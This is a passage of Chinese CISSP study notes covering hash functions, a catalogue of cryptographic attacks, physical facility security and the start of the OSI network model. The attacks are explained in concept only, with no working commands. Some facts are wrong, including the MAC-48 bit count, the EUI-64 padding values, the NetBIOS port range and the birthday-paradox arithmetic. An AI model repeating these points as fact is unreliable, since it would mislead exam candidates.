比特的分组大小,生成 224 比特的消息摘要。 *SHA-512,处理 1024 比特的分组大小,生成 512 比特的消息摘要。 *SHA-384,处理 1024 比特的分组大小,生成 384 比特的消息摘要。 —93— ③SHA-3:使用 Keccak 算法,还没发布,至少目前还没有实际破解 SHA-2 的案例。 2. MD2 MD2 是为 8 比特处理器提供的安全散列函数(很老的处理器了)。MD2 处理 16 字节(byte) 的分组大小(128 比特),在消息的结尾处添加“校验和”(checksum),生成 128 比特的消 息摘要。后来有人证明 MD2 不是单向函数,而且运算很慢,于是它被废止了。 3. MD4 MD4 支持 32 比特的处理器,处理 512 比特的分组大小,通过 3 轮计算,生成 128 比特的 消息摘要。不过其最后一个消息分组必须是 448 比特(留 64 比特做什么,书上没写)。 4. MD5 MD5 处理 512 比特的分组大小,通过 4 轮计算,生成 128 比特的消息摘要。与 MD4 一样, 它的最后一个消息分组必须是 448 比特(留 64 比特做什么,书上没写)。不管 MD 几,都已经 被证明存在散列值冲突了(不同消息得到同一个散列值),专家建议用数字签名来代替。其中, MD5 同一个摘要找出 2 条不同消息的概率约为 264,从一个摘要推算出原文的概率约为 2128。 6.变长散列(HAVAL) HAVAL 是对 MD5 的更改,处理 1024 比特的分组,运算 3 轮到 5 轮不等,生成 128、160、 192、224 和 256 比特的散列值。 不同算法的散列值有多少位是要考的,书上有表格,最好自己归纳。 7.RIPEMD-160 RIPEMD-160 是 RIPEMD-128 的改进版,处理 512 比特的分组,速度是 SHA-1 的两倍,可进 行 10 轮共 160 次运算。 8.生日悖论 birthday attack 这个理论是用来破解散列函数的,为了找到散列值的冲突或碰撞。即: 只需要集合 23 个人,其中存在 2 个人生日相同的概率就大于 50%(并不需要 365/2=183 个人)。因为 23 个人两两配对共有 n(n-1)/2=253 个不同的组合,生日共有 365 个不同的日期, 出现相同生日的概率是253/365。相应的,如果集合100个人,则两人同生日的概率超过99.99%。 9.加盐 Salting 为了应对彩虹表的暴力攻击,计算并存储密码的散列值时,要先在原始密码后面加一个随 机值,随机值与盐都存在密码文件中。这显著提高了密码被彩虹表破解的难度。 I.9 密码攻击方法(例如暴力破解、唯密文攻击、已知明文攻击) ①分析攻击(Analytic Attack)/代数攻击。分析并利用算法本身的数学逻辑性,找出更 简单的替代的算法。 ②实现攻击(Implementation Attack)/执行攻击。利用加密程序存在的漏洞,简单易 行,破密首选。包括 3 种形式: *旁路攻击 Side-channel analysis,依靠能量消耗、放射性等密码系统运行时的物理属 性来攻击,如计时分析和电磁差分分析。 *故障分析 Fault Analysis,通过注入错误信息来对比、记录、分析系统的加密漏洞。 *探测攻击 Probing Attacks,在密码模块周边进行探测和注入,希望能采集到算法或密 —94— 钥什么的。 ③统计攻击(Statistical Attack)。利用密码系统的统计弱点,例如无法真正生成随机 数,浮点运算的错误等。统计攻击试图发现运行密码系统的硬件或操作系统的漏洞。 ④穷举攻击(Brute Force/Exhaustive search)。暴力攻击。为了提高速度,通常使用 彩虹表。密码一般以散列值的方式存在数据库里,彩虹表是预先计算和整理出的散列值映射表, 可以大幅提高猜解速度。 ⑤仅知密文/唯密文攻击(Ciphertext Only Attack)。最难的攻击,因为只有几条密文, 其它啥也没有。只能通过频率分析进行统计学的攻击和预测。因为 26 个字母中,E,T,O,A,I, 是出现频率最高的。 ⑥己知明文攻击(Known Plaintext)。手上有明文,也有密文,然后想办法破解。 ⑦选定密文/可选密文攻击(Chosen Ciphertext)。手上有密文,只有部分密文有明文。 ⑧选定明文/可选明文攻击(Chosen Plaintext)。可以加密部分明文得到密文。 ⑨中间相遇攻击(Meet in the Middle)。面向加密运算,通过计算查找出密钥对(K1 加密的密文可以用 K2 解密),便两轮加密算法即双重 DES(2DES)的实际强度和一轮加密一样。 ⑽中间人攻击(Man in the Middle)。面向通信链路,在攻击者以通信代理的方式插入 收发又方的通信,截获所有数据流。 ⑾生日攻击(Birthday)。也称为冲突攻击或逆向散列匹配,利用生日悖论来进行穷举攻 击和字典攻击,寻找可以生成相同消息摘要的不同消息。 ⑿重放攻击(Replay)。既然破不了密,就截获加密的消息,下次直接重复使用它来进行 身份验证什么的。如果系统有时间戳,这个方法就不能用了。 ⒀微分/差分密码分析(differential cryptanalysis)。 差分密码分析攻击以找出加密密钥为目标。这种攻击会查看对具有特定差异的明文进行加 密而生成的密文对,并且分析这些差异的影响和结果。它在 1990 年作为一种针对 DES 的攻击 发明出来,后来演变成为一种针对 DES 和其他分组算法的成功而有效的攻击。攻击者使用两 条明文消息,并在它们经过不同的 S 盒时跟踪分组上发生的变化(每条消息都以相同的密钥加 密)。得到的密文中已确定的差异用于推测不同可能密钥值的概率。攻击者使用其他几组消息 继续上述过程,并检查公共密钥概率值。随着加密过程中的大多数可能值都被用到,密钥也就 逐渐显露出来。由于攻击者选择不同的明文消息进行攻击,因此它也是一种选定明文攻击。 ⒁线性密码分析(linear cryptanalysys)。是一种已知明文攻击,利用线性近似来描述块 密码的行为。如果有足够多的明文和相应密文对,便可得到有关密钥的少许信息,而数据量的 增加通常会给成功带来更高可能性。 ⒂彩虹表。彩虹表是对散列输出进行过分类处理的查询表,相当于密码字典的作用,提高 了破解速度。 ⒃因子分解攻击。以 RSA 算法为目标。由于该算法用大质数的乘积生成公钥和私钥,这种 攻击试图通过分解这些数的因数来找出密钥。 ⒄逆向工程。这种攻击很常用。买一套同款的密码系统,反编译来分析算法找漏洞。 ⒅社会工程。坑蒙拐骗、威逼利诱什么的。 —95— J.应用安全原则于场地与设施设计(遵循安全原则设计场地和设施) 场地的选择很重要,有很多标准很原则,都不难。这有一个新的设计理念:经常被称为环 境设计预防犯罪(CPTED)crime prevention through environmental design。指导思想是通过 结构化的物理环境和周围环境设计在潜在的罪犯作出任何犯罪行为之前影响其个人决定。 站点选址很简单,不说了。考虑什么可见性、周围区域和外界条件、可达性和自然灾害。 1.场地规划 场地规划的唯一最重要目标是确保生命、财产和运行安全。 ①道路设计 尽管直线可能是效率最高的路程,但设计者应该考虑将道路系统设计成可以将车辆速度降 至最低,从而使道路本身成为一种保护屏障。直线或垂线接近设施的道路设计方案不可采用, 因为这会使车辆有机会积攒起撞击或冲进建筑物的速度。相反,道路应该与建筑物的周界平行, 再配以天然土台、高路牙、树木或其他屏障,用以防止车辆驶离道路。 ②窗户 应该通过镶装玻璃、加框、建筑物正面支撑墙铆钉固定等涉及窗户的操作来抑制发生爆炸 事件时玻璃飞溅造成的危害。为了保护建筑物内人员,要充分考虑玻璃的特性,做好玻璃与窗 框的衔接、窗框与建筑结构的固定,形成一个平衡的整体。 *窗户不应安在门旁,因为窗户打开时可以让人摸到门并打开门锁。 *用夹层玻璃取代普通玻璃,给窗户安上防护栏,以防被人翻窗而入。 *落地窗应该无法打开,应该用栏杆和报警器保护起来。 *窗用报警器应该配有磁开关,当磁体被分开时(例如窗户打开时),报警器报警:四层楼 以下的窗户都应安装这种保护装置。 *考虑使用可以安全固定或水泥浇筑在四周建筑结构中的钢制窗框。 ③玻璃的类型 *钢化玻璃,类以于汽车的挡风玻璃。具有抗碎性,即便被撞,也只会碎成小块晶体,不 会形成尖锐的玻璃碴。钢化玻璃可用在入口门和邻近的面墙上。 *夹丝玻璃,可抵抗钝器的击打。玻璃中镶有金属丝网,因此可以提供有限的保护。 *夹层玻璃,建议临街窗户、门廊和其他访问区安装夹层玻璃。夹层玻璃由两篇普通玻璃 组成,中间隔着一个弹性塑料片。玻璃受撞击时虽然会碎,但碎玻璃会粘在内层塑料材料上。 *防弹(BR)玻璃,通常安在银行和高风险区域。防弹玻璃有多种不同的玻璃层,标配为 1.25 英寸厚,可抵御 9 毫米子弹的冲击。 ④玻璃破碎传感器 玻璃破碎传感器对于装有大量玻璃门窗的建筑物是一种非常好的入侵检测设备。玻璃破碎 传感器的基本类型包括: *声学传感器。监听与玻璃破碎频率相匹配的声学声波。 *振动传感器,探测玻璃破碎时的振动波。 采用双重技术的玻璃破碎传感器——即同时监测声波和振动波——效果最佳。 ⑤车库 *使用引导标示,给车辆和行人指引设施出入口。 —96— *用闭路电视系统监视事件,在车库安装紧急呼叫盒。 *安装明亮灯光是预防事故和攻击的最有效手段之一。 *建议车位照明度为 10-12 英尺烛光,人行和驾驶通道为 LS-20 英尺烛光。 *停车设施外部安装高亮度照明,尤其是行人交通密集的区域。 *制定规定外部照明应离地面约 12 英尺,应该可向下照射广阔的地面。 *把建筑物外墙刷成可反射灯光的白色,以增加能见度。 *战略性布局照明灯具,使灯光可以从墙壁反射,以减少可供犯罪分子或攻击者藏身的黑 暗角落。 *如果车库在设施底层,电梯或楼梯应只通控制区外面的大堂。 *所有员工和来访者均应受控接待区经过,以保持没施的完整性;通过这种方式,可进入 建筑物核心地带的电梯将只能从大堂而不是车库层进入。 2.地点威胁 ①自然威胁的类型 美国联邦应急管理局(FEMA)认为自然威肋包括以下几项: 飓风、龙卷风、地震、森林火灾、泥石流、洪水。 ②灭火系统 火需要三个元素齐备才会燃烧:热、氧和燃料源。灭火器和灭火系统通过消除其中一个元 素来灭火。水是主要灭火工具,但也会给电子设备带来极大伤害,根据火灾类型的不同,灭火 器共分四类(普水电金): *A 类灭火器应对普通易燃材料火灾,如纸、木头、纸板和大多数塑料。这类灭火器的数 字级别表明它的含水量和可以扑灭的火量。 *B 类灭火器应对可燃或易激液体火灾,例如汽油、柴油、油脂和石油。这类灭火器的数 字级别表明它可以扑灭多大面积的火。 *C 类灭火器应对的火灾涉及电气设备,如家电设备、线路、断电器、电源插座。决不可 用水来灭 C 类火灾——触电的风险太大!C 类灭火器没有数字级别。C 类意味着灭火剂不导电。 *D 类灭火器最常出现在化学实验室,用于应对易燃金属火灾,例如镁、钛和钠。这类灭 火器既没有数字级别,也没有多用途级别。它们的设计只针对 D 级火灾。 3.公用设备方面的考虑 ①供电 *应急和常规配电板,导管和开关装置分开安装在不同位置,尽可能远离。电力分配也应 在不同的地点运行。 *应急电机应安装在远离装货码头、入口和停车场的地方。比较安全的地点包括楼顶、受 保护地坪和受保护内部区域。 *电机的主要燃料储罐应安置在远离装货码头、入口和停车场的地方。对这些储料罐的访 问应受严格限制和保护,其中包括罐盖上锁和密封。 ②通信 通信设备也是企业核心公用设备的一大组成部分。应考虑配备备用电话服务来保持发生事 故时的通信通畅。对于大多数机构来说,应该给特定员工配备移动电话,或者机构保留一份电 —97— 话联系单,上面列出所有关键员工和他们的移动电话号码。 ③公用设备 为了把发生灾害后出现关键故障的可能性降至最低,应采取以下措施: *如果可能,把公用设备安置在地下遮蔽起来并提供严密保护。 *如果没有冗余电源可用,考虑快速连接便携公用设备备用系统。 *确保检修孔等访问点的安全,保护饮用水源免受水传播污染物污染。如果必要,对水进 行常规测试,帮助检测水传播污染物。 *把标识关键公用设备的标志尽可能做小。用护栏防止未经授权访问,利用绿化景观掩蔽 地面上的系统。 *把汽油、石油和润滑油储罐及其操作间安置在地势低于所有其他建筑物的地点。燃料储 罐应远离建筑物至少 100 英尺。 *公用设备系统至少远离装货码头、前门入口和停车场 50 英尺。 K.设计和实施物理安全 第三域的物理安全都是宏观的、外部的;第七域的物理安全都是具体的、内部的。 联邦应急管理局(FEMA)以“风险管理系列”(RMS)的形式发布广泛指南,致力于从设计 上指导如何抑制多重危险事件。该系列包含一大批有关人为灾害的出版物,旨在提高建筑物的 安全性,降低预计的恐怖袭击对建筑物的潜在影响。该系列的目的是减少建筑物及其相关基础 设施的结构和非结构构件受到的物理损害,减少常规炸弹,化学、生物和放射制剂,地震,洪 水和狂风造成的人员伤亡。该系列的预期对象包括为私人机构工作的架构师和工程师、建筑物 业主/经营者/管理者、负责建筑学领域工作的州和地方政府官员。 为具体环境设计物理安全性时,需要牢记控制措施的功能顺序: 1. 阻拦/威慑 Deterrence 安控措施应当打消坏人对非法访问的念头(边界限制)。 2. 拒绝 Denial 阻拦失败,应当拒绝对物理资产的直接访问(关闭保险库大门)。 3. 检测 Detection 拒绝失败,系统就需要检测入侵(使用运动探测器) 4. 延缓 Delay 最后要充分地延缓入侵,以便快速响应并处置。(设备上锁) 一个组织机构的物理安全计划应当涉及下列目标: ①通过震慑预防犯罪和破坏——栅栏、保安、警示标志等。 ②通过使用延迟机制来减少损失——延缓对手行动的防御层,如锁、安全人员和屏障。 ③犯罪或破坏检测——烟雾探测器、运动探测器、CCTV 等。 ④事故评估——保安检测到的事故的反应以及破坏级别的确定。 ⑤响应措施——灭火机制、应急响应过程、执法通告、外部安全专家咨询。 K.1 配线间 1.接线柜的安全策略有: *从不把配线窒作为一个通用的存储区。 *有足够的锁。 *保持区域的整洁。 —98— *不要存放易燃易爆物品的区域。 *设置视频监控监控内部的配线间站动。 *使用门打开传感器日志条目。 *不要把钥匙给除了授权管理人员之外的任何人。 *对配线间的安全和内容定期进行检查。 *把配钱间纳入组织的环境管理和监控,以确保有适当的环境控制和监测,以及检测破坏 性条件,如洪水或火灾。 2.电缆设施管理 电缆设施的关键成分包括入口设备、设备机房、主干电缆、主干线架设通路、通信机房和 水平配线系统。 3.防雷电保护 雷电击中某个接地系统会造成地电位或接地电位上升(GPR)。与这个接地系统连接的有线 通信的任何设备都极可能被这股寻求远程接地的输出电流毁坏,损伤有时不会马上显现,这就 是所谓的潜在损伤,导致设备出现过短的“平均故障间隔时间”(MTBF)。 最好的防雷就是用光缆,但这成本太高了。设备防雷工程可以是将有线通信与远程地面隔 离,通过使用光学隔离器或隔离变压器实现。这套装置组合在一起,安装在绝缘的机柜表面, 称作高压接口(HVI)。HVI 在接地电位上升(GPR)期间隔离设备,阻止任何电流从高电势接地系 统流向低电势接地系统,可完全保护任何设备或在设备上工作的的人员免受损害或伤害。 K.2 服务器机房 服务器机房需要比设施其他地方级别更高的安全保护。其中包括一个受严格保护的无窗户 和只有一个受管控入口的房间。切记,服务器一旦被人入侵,整个网络都将暴露在风险之下。 1.机架安全 机架锁可确保只有正确的人才可以访问服务器,只有负责通信的人才可以访问通信设备。 “可管理”机架锁可在远程配置,仅限于特定人员在特定时间需要时访问,可减少事故、破坏 或未经授权安装恰设备(有可能毁坏性增加耗能和机架温度)的发现。 2.受限工作区安全 像政府敏感信息隔间设施(SCIF)这样的受严格限制的工作区一样,需要增加安全措施,以 确保对这些区域的访问受到更严格的限制。 此外,服务器房间应设在建筑物的核心。尽量避免在放置在底层、顶层和地下室。服务器 房间应远离水、气和污水管道,这些管道泄漏或泛滥的风险太大,可能会造成严重的损坏和故 障停机时间。服务器机房的墙壁还应当至少达到 1 小时防火时间的防火等级,而存放纸质和存 储介质的房间墙壁要至少防 2 个小时的火。 K.3 介质存储设施 没什么内容,都很浅显。 K.4 证据存储 保留日志、审计和其他数字事件的记录是十分重要的,可用于内部企业调查或和执法为基 —99— 础的电子取证。 K.5 限制区和工作区安全 (例如:运营中心) 进入含有更高价值或重要性资产的区域应该受到限制。例如,只有网络管理员和安全人员 才能够进入服务器机房。核心区域必须从地板到天花板之间全部封闭。要防止肩窥(在身后窥 视操作者的显示器或键盘动作来收集信息)。 K.6 数据中心安全 有数据中心的单位,这个数据中心一定是核心要素了,其安全至关重要。 1.智能卡 Smartcards 智能卡形式多样,包含了经过授权的可以被用于身份识别和或身份验证目的的持卡人信 息。有的智能卡具有处理信息的能力或存储了一定数量的数据。如果智能卡丢失了,很可能被 冐用,于是最常用的多因子认证方式还要求使用 PIN 码。 还有什么无记忆的卡、接近式读卡机(Proximity Readers)都很好理解,不多说。 2.入侵检测系统 Intrusion Detection Systems 这里讲的是物理的入侵检测,包括保安人员、自动化访问控制措施、运动探测仪以及其他 特殊的监控技术。一般都是通过检测电流的变化或者通信的通断来预警意外情况。 3.电磁放射的保护 Emanation Security 用于阻止放射攻击的对策和防护手段被称为瞬时电磁脉冲设备屏蔽技术(TEMPEST)设备。 TEMPEST 最初是一个政府研究项目,现在防止放射截获的一系列方法的统称。主要有 3 种: ①法拉第笼/屏蔽网/Faraday Cage 只要有金属屏蔽网,电磁信号就传不了。 ②白噪声 White Noise 白喋声指的是一直广播虚假通信数据,从而掩盖和隐藏实际存在的放射信号。 ③控制区 Control Zone 控制区只是在受保护区域环境内实现法拉第笼或白噪声,在受保护区域环境外则不采取任 何措施。受控区一般是涉密单位都有的“屏蔽机房”,也可以是一层楼或整座建筑。 4.人员出入控制 ①内部捕人陷阱。 ②双门入口。双门入口一次只允许一个人进出,只有等内门关闭后外门才会打开。双门入 口可增设生物测量装置,必须在内门打开之前激活。 ③“两人”规则。即在一个区域内必须有两个人结伴在一起,不可一人独自逗留。 K.7 公用设施和供热通风与空调系统考虑事项 1.公用设施和电力 数据中心要有双路电源引接,并且有 UPS 和发电机组。 2.不间断电源(UPS) UPS 只能维持供电一小段时间,但往往足以应对电力公司的小故障或短时停电,也可以让 设备有机会正常关机。时间长了就要发电。UPS 另一个重要功能是可以稳压和电涌保护。 —100— 3.发电机 发电机应该最快在发生停电故障后的 10 秒内启动。 4.电涌保护 电涌保护器包含一个保险丝,它在电源功率剧烈变化而造成对设备的损坏之前熔断。因为 它会造成突然断电,对设备还是有伤害的,不如使用 UPS。什么是电涌?下面这些都是要考的 电源专业词汇: *故障(fault) 电力的瞬间/短时消失。——*断电/中断(blackout) 电力完全/长时消失。 *衰变/电压不足(sag) 瞬间电压降低。——*降压/电压过低(brownout) 长时间低电压。 *脉冲/尖峰(spike) 瞬间高电压。——*电涌/浪涌(surge) 长时间的高电压。 *瞬时现象(transient) 短时间的线路干扰。——*噪声(noise) 持续不断的电源干扰。 *平稳(clean) 完全平稳的电流。 *接地(ground) 电路中的电线是接地的。 *起动功率(inrush) 脉冲和电涌通常在连接电源时发生(插拨)。瞬时涌流/励磁涌流 5.噪声 Noise/电磁干扰 由电流产生的噪声会影响任何一种依赖于电磁传输机制的数据传输,例如电话、蜂窝电话、 电视、音频、无线电和网络机制。手机靠近电脑、电视什么接电话,肯定有嗞嗞嗞的声音。 电磁干扰(EMI) electromagnetic interference 有两种类型: 普通模式 Common mode 噪声是由电子设备的火线和地线之间的电势差产生的。 导线模式 Traverse mode 噪声是由电子设备的火线和零线之间的电势差产生的。 射频干扰(RFI) Radio frequency interference 与 EMI 一样,影响许多系统。RFI 由很多 常见的电器所产生,包括荧光灯、电缆、电子加热器、计算机、电梯、电动机和电磁铁等。 6.散热、通风和空调(HVAC) 机房保持温度在华氏 60 到 75 度之间(摄氏 15 到 23 度),湿度应当维持在 40%和 60 %之 间。湿度太高会导致侵蚀,湿度太低则会导致产生静电。 缩略语 HVAC 代指散热、通风和空调。热会使处理器速度减慢并停止执行程序,从而给计 算机设备带来广泛损害,甚至会使焊接变松乃至完全断开。过热会降低网络性能和造成宕机。 数据中心和服务器机房需要配备不间断散热系统。 K.8 供水问题 (例如:渗漏、洪灾) 水会搞坏设备的。有些地方的水不容易被发现和重视: *通风系统发生堵塞后,潮湿的热空气将无法快速流动,从而造成冷凝; *如果通风口位于机器上面或后面,会看不到冷凝形成的小水珠; *若不能适当清除冷凝,单机空调特别容易形成漏水; *进风口附近哪怕只聚积少量水,也会提升湿度,使服务器充满潮气。 K.9 火灾预防、探测和灭火 火灾方面肯定会出考题的。 1.燃烧的三要素:燃料 fire,、高温 heat 和氧气 oxygen。 —101— 各种灭火方法是通过阻断燃烧的哪个要素来实现的,这不难。 2.起火的四个阶段: ①阶段 1:开始阶段,空气电离,不存在冒烟。 ②阶段 2:冒烟阶段,起火点出现烟雾。 ③阶段 3:火焰阶段,肉眼能够看到火焰。 ④阶段 4:高温阶段,起火时间已经相当长,此时温度极高,并所有东西都在燃烧。 数据中心发生的大多数火灾都是由配电插座过载导致的。 3.灭火器 Fire Extinguishers/火灾类型/普液电金 A 普通的易燃品 Common combustibles 水、苏打酸,干粉、专用液体 Water, soda acid (a dry powder or liquid chemical) B 液体,Liquids 二氧化碳、哈龙、苏打酸/CO2,halon,soda acid C 电气,Electrical 二氧化碳、哈龙/CO2,halon D 金属,Metal 干粉/Dry powder 4.防火检测系统 Fire Detection Systems ①火焰激发系统。根据火焰的红外线能量来触发灭火抑制装置。 ②烟感系统。根据光电或放射性电离传感器来触发灭火抑制装置。 ③温感系统。包括固定温度(高于 XX 度)或升温速度(每分钟升 15 度)探测器。 5.放水灭火系统 Water Suppression Systems 目前有四种主要的放水灭火系统。 ①湿管道系统 wet pipe system (也称为封闭头系统 closed head system)。管里一直有 水,当灭火装置被触发的时候,就会立刻放水。 ②干管道系统 dry pipe system。管中是压缩空气,当灭火装置被触发的时候,先排队空 气,再放水。 ③洪水系统/密集洒水 deluge system。是干管道系统的另外一种形式,它使用较粗的管 道,因此能排出大股的水流。这显然不能用在机房。 ④预先响应系统/预作用 preaction system。是干/湿管混合系统。平时都是干管,有烟、 热等火灾症候时(温度上升),预先充水,但不打开喷水阀门;如果喷水头受到临界高温了, 就自动喷水;如果还没到触发的高温,火灾已经被灭或者没有发生,就手动把水再抽回去。 6.气体释放系统 Gas Discharge Systems 气体释放系统通常比放水系统更有效,机房经常用到。不过,气体释放系统会排除氧气, 对人是非常危险的。使用的气体有主要: ①二氧化碳 CO2 ②哈龙 halon(二氟二氯甲烷):好用,但在华氏 900 度的时有毒且破坏臭氧层(氯氟烃)。 ③FM-200(哈龙最好的替代物),是一种无色液化压缩气体,不会影响视线,不置换氧气, 可用于有人的空间。还有别的替代物:NAF-S-ID、CEA-410、CEA-308、FE-13、烟烙尽(Inergen)、 氩气(Argon)、氮氩气(Argonite)什么的。 7.火的破坏性 ①烟会损坏存储设备;热会损坏所有电子设备。 —102— ②华氏 100 度会损坏存储磁带;175 度损坏 CPU 内存等设备;350 度损坏纸质材料。 ③灭火介质(水、干粉、化学品)会引起短路,腐蚀设备。 ④消防员强拆会破坏设施。 —103— 第四域 通信与网络安全 (设计及保护网络安全) Chapters 11,12 in OSG 7 th Chapters 6 in AIO 6 th A.应用安全设计原则于网络架构(例如:IP 协议与非 IP 协议,网络分段) 本域由 4 大内容组成(偏重技术,无管理): A.什么是网络(结构、协议);B.网络怎么连(方法、组件); C.信息怎么传(格式、通信);D.安全怎么做(措施、攻击)。 A.1 OSI 与 TCP/IP 模型 一、分层模型 网络通信一般是按层描述。几种不同的分层模型存在;最常用的是: *参考模型,分为七层(物理层,数据链路层,网络层,传输层,会话层,表示层,应用层) *TCP/IP 或(DoD)模型,分为四层(链路层,网络层,传输层,应用层),是个协议栈。 怎么理解和记忆两种模型、上下的封装关系,搞网络的一般都清楚。 通信类型 OSI 模型 TCP/IP 模型 运用场景 数据流(应用消息)-Date(Message) Application 数据类型-Format Presentation Application 主机 应用连接-会话-Session Session 段 Segment(TCP) 报文 Dategram(UDP) Transport Host-to-host 逻辑连接 包-Packet Network Internet IP 网 帧-Frame。细分 2 层: 逻辑链路控制 LLC+介质访问控制 MAC Data link Network access 通 信 网 以太网 比特/位-Bits Physical 承载网 TCP/IP 既是分层协议(分四层),也是聚合协议(聚合了七层里的部分层,也融合了很 多协议共同工作)。 二、各层协议 第一层:物理层 这一层定义了网络的物理拓扑。这一层是只关心物理信令。只有硬件处理信号在这层定义: 这些都是:电缆,连接器,集线器和中继器等。 ■ EIA/TIA-232 and EIA/TIA-449 ■ X.21 ■ High-Speed Serial Interface (HSSI) 高速串行接口 ■ Synchronous Optical Network (SONET) 同步光网络 ■ V.24 and V.35 第二层:数据链路层 数据链路层接收来至于网络层的数据包(Packet),生成在网络中传输的数据帧(Frame)。 —104— 这一层确保与通信对端信息交换的无误(或容错)。如果数据链路层检测到帧里面的错误,它将 请求对端重新发送该帧。数据链路层将信息从更高层进行格式转化,该转化基于某种网络技术, 如以太网,令牌环网等等。这一层使用硬件地址发送帧到对端设备,只是做物理的连接。数据 链路层关注的是将数据帧发送到下一跳链路。二层网络通信技术有以太网 Ethernet(IEEE 802.3),令牌环网 Token Ring (IEEE 802.5),异步传输模式 ATM(asynchronous transfer mode), 光纤分布式数据接口 FDDI(Fiber Distributed Data Interface),和铜线分布式数据接口 CDDI(Copper DDI)。 该层其实还细分了两层,上面的 LLC 子层(IEEE 802.2)和下面的 MAC 子层(IEEE 802.3)。 第二层必须要讲讲 MAC 地址: 该层要向数据帧添加硬件的源地址和目的地址,硬件地址指的是介质访问控制(MAC)地址 (Media Access Control address),它是一种用十六进制表示法表示的 6 字节(48 比特)二进 制地址,例如 OO-13-02-1F-58-F5。前三个字节(24 比特)代表物理网络接口(网卡)的供应商 或制造商,这被称为组织唯一标识符(OUI) Organizationally Unique Identifier;后三个字 节(24 位)是设备的唯一代码。世界上没有两个设备具有相同的 MAC 地址(中国的山寨网卡就 有可能一样)。 讲了 MAC 地址就要知道 MAC-48、EUI-48 和 EUI-64(考点): MAC-48 和 EUI-48 一样,都是 6×8=64 位,前者用于网络设备,后者用于其它设备和软件。 而 EUI-64 是为了适应 IPv6 协议和激增的网络设备,而出现的新的地址标准,它向下兼容,具 体表示方法就是: MAC-48 在中间加 FF:FF,比如:cc:cc:cc:FF:FF:cc:cc:cc EUI-48 在中间加 FF:FE,比如:cc:cc:cc:FF:FE:cc:cc:cc 链路层支持的协议有: ■ Serial Line Internet Protocol (SLIP) 串行线路网络协议 ■ Point-to-Point Protocol (PPP) 对点协议 ■ Address Resolution Protocol (ARP) 地址解析协议:将 IP 地址解析为 MAC 地址 ■ Reverse Address Resolution Protocol (RARP) 反向地址解析协议:MAC 解析为 IP ■ Layer 2 Forwarding (L2F) 二层转发协议 ■ Layer 2 Tunneling Protocol (L2TP) 二层隧道协议 ■ Point-to-Point Tunneling Protocol (PPTP) 点对点隧道协议 ■ Integrated Services Digital Network (ISDN) 综合服务数字网络 第三层:网络层 数据链路层使用硬件寻址(MAC),网络层则使用逻辑地址寻址(IP 寻址体系)。网络层向数 据中添加路由信息和寻址信息(源和目的 IP 地址),负责路由选择和传送信息,也管错误检 测和节点数据通信(也就是通信控制),但不对传输进行验证(由传输层负责验证)。 网络层的典型协议有: ■ Internet Control Message Protocol (ICMP) 网络控制报文协议 ■ Routing Information Protocol (RIP) 路由信息协议 ■ Open Shortest Path First (OSPF) 开放式最短路径优先 —105— ■ Border Gateway Protocol (BGP) 边界网关协议 ■ Internet Group Management Protocol (IGMP) 网络组管理协议(用来多播) ■ Internet Protocol (IP) 网络协议 ■ Internet Protocol Security (IPSec) 网际协议安全 ■ Internetwork Packet Exchange (IPX) 互联网分组交换协议 ■ Network Address Translation (NAT) 网络地址转换 ■ Simple Key Management for Internet Protocols (SKIP) 网络简单密钥管理协议 ■ Dynamic Host Configuration Protocol(DHCP)动态主机配置协议(IP 分配) 最重要的是 IP 协议,有两大功能: ①寻址:IP 协议使用 IP 目的地址通过网络进行转发数据包,直至该数据包到达目的地。 ②分段:如果数据包大小大于本地网络允许的最大数据值,IP 协议将该数据包拆分。 IP 是无连接的协议,不保证传输的可靠性。 最广泛的还有路由协议,考试涉及的动态路由协议有: ①距离矢量 distance vector。距离矢量路由协议维护一个目的网络以及距离和方向的跳 数的列表(也就是到达目的地所经过的路由器数量) 有 RIP、IGRP、EIGRP。 ②链路状态 link-state。链路状态路由协议维护一个所有己连接网络的拓扑图,并且使 用这个拓扑图确定到达目的地的最短路径,有 OSPF 和 IS-IS。 BGP 是外部路由协议(EGP),不适用于上述两种分类,有题目认为是路径矢量 path-vector。 过去常用的非 IP 协议有: IPX、AppleTalk 和 NETBUI。(虽然过时了,但这些协议是可以绕过防火墙的) ①互联网分组交换协议 IPX 是 IPX/SPX 协议套件常用的,使用于上世纪 90 年代的 Novell NetWare 网络。 ②AppleTalk 协议是一套由苹果公司开发并使用于 Macintosh 系统网络上,最早版本于 1984 初发布。2009 的 Mac OS v10.6 版本发布后取消了苹果操作系统对 AppleTalk 的支持。 IPX 和 AppleTalk 都可以通过 IP 协议网关实现死区网络与 IP 网络的互联(死区是使用非 IP 协议网络的网段)。 ③NetBIOS Extended User Interface/NetBIOS 扩展用户界面(NetBEUI 又名 NetBIOS 帧 协议或 NBF),是微软最广泛认知的一个协议,于 1985 年开发并用于支持文件和打印机共享。 微软通过使用 NetBIOS over TCP/IP (NBT)技术,使 NetBIOS 工作于 TCP/ IP 协议上,从而仍 能运用于现代网络。NetBIOS 端口(127-139)己成为流行的网络蠕虫攻击的目标,基于 NetBIOS 实现的弱点被循环利用,但问题不在协议自身。但作为一个低层协议,NetBIOS 已不再获得支 持,只有它的 SMB(Server Message Block)和 CIFS(Common Internet File System)的变 种仍在使用。 其它需要了解的协议: ICMP 网络控制报文协议 就是 ping 、traceroute 、pathping。ICMP 最重要的应用就是拒绝服务攻击了。第九域 有归纳,这里简介一下:死亡之 ping 发送一个畸形的大于 65535 字节数据包给一台计算机并 试图让其崩溃。Smurf 攻击通过欺骗广播 ping 对目标网络产生巨大的流量。ping 数据包泛洪 —106— 是一个基础的拒绝服务(DoS)攻击,它消耗目标可用的所有带宽。 DHCP 分配出租 IP 地址的 4 步流程:The four-step DHCP lease process is: 1.发现 DHCP。DHCP DISCOVER message 2.响应发现。DHCP OFFER message 3.请求地址。DHCP REQUEST message 4.响应请求。DHCP ACK message 第四层:传输层 传输层负责管理连接的完整性并控制会话。传输层接收来自于会话层的 PDU(Protocol Data Unit),比如:协议数据单元、数据包单元、数据负荷单元等,并将其转换为数据段。 会话规则指定每个数据段中可以包含多少数据、如何验证传输数据的完整性、如何确定数据是 否丢失。会话就是端到端的一个逻辑通信连接。该层协议有: ■ Transmission Control Protocol (TCP) 传输控制协议 ■ User Datagram Protocol (UDP) 用户数据报协议 ■ Sequenced Packet Exchange (SPX) 顺序数据包交换 ■ Secure Sockets Layer (SSL) 安全套接字层 ■ Transport Layer Security (TLS) 传输层安全 用户数据报协议(UDP)和传输控制协议(TCP)是最重要的传输层协议,详见 TCP/IP 模型。 第五层:会话层 会话层负责在两台计算机之间建立、维护和终止通信会话(使用会话)。这一层管理对话 模式或对话控制(单工、半双工、全双工),并为分组和恢复建立检查点,以及重新传输上一次 